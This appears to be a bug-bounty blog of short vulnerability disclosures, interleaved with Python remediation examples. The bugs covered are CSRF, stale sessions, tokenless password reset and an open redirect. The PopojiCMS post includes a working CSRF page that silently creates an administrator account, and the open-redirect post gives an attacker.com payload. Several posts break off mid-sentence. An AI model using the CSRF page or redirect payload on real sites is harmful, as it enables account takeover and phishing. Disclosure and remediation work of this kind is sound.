Posts

Missing CSRF Token On Add Admin [Popoji CMS]

Description: This happens because the "add admin" request carries no CSRF token, so any page that a logged-in administrator visits can submit the request on their behalf.

Step To Reproduce:

    <script>
    function getMe() {
        // build the forged request
        var xhr = new XMLHttpRequest();
        // now execute the CSRF attack
        xhr.open("POST", "http://root/popoji/poadmin/route.php?mod=user&act=addnew", true);
        xhr.withCredentials = true; // the browser attaches the victim's admin session cookie
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashandy21%40gmail.com&no_telp=083833232954&level=1');
    }
    </script>
    <button onclick="getMe();">Let's Rock</button>

1. Save the code to a .html file.
2. Upload it to a host.
3. Execute it (open the page while logged in as admin and click the button).

Video: https://www.youtube.com/watch?v=1FXXuSiB6jo

Fix & Mitigation: Require a token on every request that performs a sensitive action.

Note: they gave me permission to disclose it, and th
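The fix described above, worked through as an added example (this is not PopojiCMS code, and `add_admin`, `SESSIONS` and `ADMINS` are hypothetical names): a per-session synchronizer token is embedded in the admin form and checked on every state-changing request. The forged request from the PoC carries the victim's cookie automatically, but the attacker's page cannot read the token, so the handler rejects it.

```python
import hmac
import secrets

# Constructed in-memory stores standing in for the CMS's session and user tables.
SESSIONS = {}   # session id (cookie value) -> session data
ADMINS = []     # usernames created through the add-admin action


def new_session(user, level):
    """Log a user in: mint a session id and a CSRF token bound to that session."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {
        "user": user,
        "level": level,
        # The token is random per session; it is rendered into the form as a hidden
        # field and is never readable from another origin.
        "csrf": secrets.token_urlsafe(32),
    }
    return sid


def csrf_token_for(sid):
    """Value the legitimate form embeds as <input type=hidden name=csrf_token>."""
    return SESSIONS[sid]["csrf"]


def add_admin(cookie_sid, form):
    """Hypothetical handler for route.php?mod=user&act=addnew with a CSRF check.

    cookie_sid: session id taken from the request cookie (sent automatically
                by the browser, which is exactly what CSRF abuses).
    form:       parsed application/x-www-form-urlencoded body.
    """
    session = SESSIONS.get(cookie_sid)
    if session is None or session["level"] != 1:
        return 403, "not an admin session"

    # The cookie alone must not authorize the action: the request must also
    # prove it came from our own form by echoing the session's token.
    sent = form.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), session["csrf"].encode()):
        return 403, "missing or invalid CSRF token"

    ADMINS.append(form["username"])
    return 200, "admin %s added" % form["username"]


if __name__ == "__main__":
    sid = new_session("admin", level=1)
    # Forged request: same body as the PoC, cookie present, no token.
    print(add_admin(sid, {"username": "root", "password": "Mypass1337", "level": "1"}))
    # Legitimate request from the real form, which includes the hidden token.
    print(add_admin(sid, {"username": "root", "password": "Mypass1337", "level": "1",
                          "csrf_token": csrf_token_for(sid)}))
```

`hmac.compare_digest` avoids leaking the token through timing. Marking the session cookie `SameSite=Lax` or `Strict` is a useful second layer, but the token check is what makes the handler itself safe.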

Session not expired when password has been changed [app.cobalt.io]

Session not expired when password has been changed on app.cobalt.io

Description: When the user changes their password from another platform, the previous platform stays connected to the account and can still edit the profile.

POC:
1. Log in on Mozilla.
2. Log in on Chrome.
3. Change the password on Chrome.
4. Go back to Mozilla; you are still able to access the account.
5. You can still edit the profile.

Video: https://youtu.be/Cz2zh7w4n6M (unlisted)
Bounty :
Note: I asked app.cobalt.io for permission to write it on my blog, and they gave me permission, so I write it here. Hope you enjoy~

Password Reset Token Issue [app.legalrobot.com]

Password Reset Token Issue [app.legalrobot.com]

Summary: The password can still be changed without the token.

Steps to Reproduce:
1. Request a password reset link.
2. Go to your email and click the password reset link: https://app.legalrobot.com/password-reset/token?v=uWe_yFJS0-N9fIk0nG0b0NZ70lkwNNi7RdUZu0KhiaX
3. Now remove the token and use the link https://app.legalrobot.com/password-reset
4. Observe that you are able to reset the password without the token.

Fix: A password reset link should only ever work with a valid token.

Reference: https://hackerone.com/reports/253934

At first my report got N/A; I explained a little bit and got a $20 bounty, yay. You can see my original report at https://hackerone.com/reports/265775. Thanks,
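The fix above, as an added example that is not app.legalrobot.com's code (`issue_reset_token`, `reset_password`, `RESET_TOKENS` and `USERS` are hypothetical names): the reset endpoint refuses to do anything without a token, and a token is single-use, time-limited and stored only as a hash so a database leak does not hand out working reset links.

```python
import hashlib
import secrets
import time

# Constructed stores standing in for the application's database.
USERS = {"alice": "hash-of-old-password"}
RESET_TOKENS = {}   # sha256(token) -> (username, expiry unix time)


def _digest(token):
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(user, ttl=900, now=None):
    """Mint the token that goes into the e-mailed link (?v=<token>).

    Only its hash is stored; the plaintext exists in the e-mail and nowhere else.
    """
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[_digest(token)] = (user, now + ttl)
    return token


def reset_password(token, new_password, now=None):
    """Hypothetical handler for /password-reset.

    Returns (status, message). The first check is the one the bug report is
    about: a request with no token at all must be rejected, never treated as
    'already authenticated'.
    """
    now = time.time() if now is None else now
    if not token:
        return 400, "reset token required"

    # pop() makes the token single-use even if the later checks fail.
    entry = RESET_TOKENS.pop(_digest(token), None)
    if entry is None:
        return 403, "unknown or already used token"

    user, expires_at = entry
    if now > expires_at:
        return 403, "token expired"

    USERS[user] = "hash-of-" + new_password   # stand-in for a real password hash
    return 200, "password reset for %s" % user


if __name__ == "__main__":
    tok = issue_reset_token("alice")
    print(reset_password("", "NewPass1"))      # the reported bug: no token -> rejected
    print(reset_password(tok, "NewPass1"))     # valid link -> 200
    print(reset_password(tok, "NewPass2"))     # replay of the same link -> rejected
```

Looking the hash up in a dictionary is not constant-time, but since the stored value is a hash of a 256-bit random token, a timing side channel on the lookup gives an attacker nothing useful; comparing the raw token with `==` would be the thing to avoid.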

Open Redirect On Codepolitan.com

Open Redirect On Codepolitan.com

Description: Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within that untrusted input. By modifying untrusted URL input to point at a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application's access control check and then forward the attacker to privileged functions that they would normally not be able to access.

Impact: Forces the user to go to an untrusted website from a codepolitan link.

Location of bug: https://www.codepolitan.com/users/login?callback=

Payload: http://attacker.com

Reproduce:
1. Open https://www.codepolitan.
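The safe way to consume a `callback` parameter, as an added example that is not Codepolitan's code (`SITE_ORIGIN` and `safe_callback` are assumed names): only a site-relative path is accepted, and the usual bypasses for naive "starts with /" checks are handled, including scheme-relative `//attacker.com`, backslashes that browsers normalise to slashes, `javascript:` URLs and look-alike hosts such as `www.codepolitan.com.attacker.com`.

```python
from urllib.parse import urljoin, urlsplit

# Assumed origin of the application; the only host a login callback may land on.
SITE_ORIGIN = "https://www.codepolitan.com"
DEFAULT_AFTER_LOGIN = "/"


def safe_callback(callback, default=DEFAULT_AFTER_LOGIN):
    """Return an absolute URL on SITE_ORIGIN, or `default` if `callback` is unsafe.

    Strategy: accept only a path that is relative to our own origin, then resolve
    it and re-check that the resolved URL still lives on our host.
    """
    if not callback:
        return default
    cb = callback.strip()

    # Browsers treat '\' like '/', and control characters are a classic
    # way to slip past prefix checks, so reject both outright.
    if "\\" in cb or any(ord(c) < 0x20 for c in cb):
        return default

    parts = urlsplit(cb)
    # Any scheme (http:, javascript:, data:) or any host (//attacker.com) means
    # the caller is trying to leave the site.
    if parts.scheme or parts.netloc:
        return default
    # Must be a site-relative path, and '//' / '///' are not paths to a browser.
    if not cb.startswith("/") or cb.startswith("//"):
        return default

    target = urljoin(SITE_ORIGIN + "/", cb)
    # Belt and braces: the resolved URL must still be on our origin.
    if urlsplit(target).netloc != urlsplit(SITE_ORIGIN).netloc:
        return default
    if not target.startswith(SITE_ORIGIN + "/"):
        return default
    return target


if __name__ == "__main__":
    # Constructed inputs: the reported payload plus common bypass attempts.
    for cb in ["http://attacker.com", "//attacker.com", "/\\attacker.com",
               "javascript:alert(1)", "https://www.codepolitan.com.attacker.com/",
               "/users/profile?tab=1"]:
        print("%-45s -> %s" % (cb, safe_callback(cb)))
```

If the application genuinely needs to redirect to other hosts (an SSO partner, for instance), replace the relative-path rule with an explicit allowlist of full hostnames compared after parsing, never a substring or prefix match on the raw string.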

Mixed content when logout On [merchants.google.com] - Duplicate

Summary: Mixed content when logging out of merchants.google.com. Mixed content loads when the user logs out from https://merchants.google.com/ and is redirected to http://www.google.co.id/accounts/Logout2?ilo=1&ils=s.ID&ilc=0&continue=https://merchants.google.com/mc&zx=-2055164642

Steps to reproduce:
1. Sign in to https://merchants.google.com/
2. Log out.
3. Mixed content loads at http://www.google.co.id/accounts/Logout2?ilo=1&ils=s.ID&ilc=0&continue=https://merchants.google.com/mc&zx=-2055164642

Browser/OS: Mozilla
Video: https://youtu.be/85BtW_4PVzQ (unlisted)
Picture :
Timeline: Google confirmed it, but it is a duplicate. Maybe next time I'll get the bounty :D, wish me luck!

[store.line.me] Still can change wishlist URL although wishlist is set to private

Summary: The wishlist URL can still be changed although the wishlist is set to private. Normally, when the wishlist is set to private, the user can't change the wishlist URL, but I found a way to change the URL even though the wishlist is set to private.

Step To Reproduce:
1. Log in to store.line.me.
2. Go to wishlist -> setting.
3. Turn on Burp Suite and catch the request sent when changing the URL.
4. Set the wishlist to private again.
5. Replay the request from step 3.

This was not eligible for a bounty; the LINE side said this is a bug, but not a security bug. This means I need to learn more and more. hehehe, wish me luck.

Video: https://youtu.be/gyp3T7Cnw5c

Session not expired When logout [partners.uber.com]

It's funny: I could reproduce it 4 days ago and made a video, but the team said "we're unable to reproduce this issue following the steps you provided." Here is a copy-paste of my report on HackerOne:

Hi,

Summary: The partners.uber.com website is not expiring the user's session immediately after logout. When the user logs out, the session does not expire; requests can still be sent and the server responds with OK.

Steps to Reproduce:
1. Log into the website partners.uber.com.
2. Capture any request, for example the profile edit page, using Burp proxy.
3. Log out from the website.
4. Replay the request captured in step 2 and notice it displays the proper response.

Thanks, the team fixed this issue and said this was an unvalidated issue. But the team did not want to disclose the report; finally, after a few roasts, the team agreed to disclose. I tried to contact HackerOne support, because when I wanted to call the HackerOne team to my report, there was no option on my report. Last
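Both the app.cobalt.io report (sessions surviving a password change) and this partners.uber.com report (sessions surviving logout) come down to the same design point: the server, not the browser cookie, must be the authority on whether a session is alive. The example below is added here and is not code from either company; `SessionStore` and `handle_profile_edit` are hypothetical names. Logout deletes the session server-side, and a password change revokes every other session for that user, so a captured request replayed from the old browser gets a 401.

```python
import secrets


class SessionStore:
    """Server-side session registry (constructed example).

    Because the server keeps the list of live sessions, it can revoke them;
    merely telling the browser to drop its cookie leaves a captured session id
    valid, which is exactly what both bug reports demonstrate.
    """

    def __init__(self):
        self._sessions = {}   # session id -> {"user": username}

    def login(self, user):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user}
        return sid

    def logout(self, sid):
        # Forget the session server-side; a replay of the old id must now fail.
        self._sessions.pop(sid, None)

    def change_password(self, user, keep_sid=None):
        """Revoke every session of `user` except the one that made the change."""
        for sid in list(self._sessions):
            if self._sessions[sid]["user"] == user and sid != keep_sid:
                del self._sessions[sid]

    def authenticate(self, sid):
        """Return the username for a live session id, or None."""
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None

    def live_sessions(self, user):
        return sum(1 for s in self._sessions.values() if s["user"] == user)


def handle_profile_edit(store, cookie_sid, new_name):
    """Hypothetical profile-edit endpoint: every request re-checks the store."""
    user = store.authenticate(cookie_sid)
    if user is None:
        return 401, "session expired"
    return 200, "%s renamed to %s" % (user, new_name)


if __name__ == "__main__":
    store = SessionStore()
    firefox = store.login("alice")          # session from the first browser
    chrome = store.login("alice")           # session from the second browser
    store.change_password("alice", keep_sid=chrome)
    print(handle_profile_edit(store, firefox, "mallory"))   # cobalt.io case -> 401
    store.logout(chrome)
    print(handle_profile_edit(store, chrome, "mallory"))    # uber case -> 401
```

Keeping the one session that performed the password change is a usability choice; a stricter policy revokes all sessions and forces a fresh login everywhere.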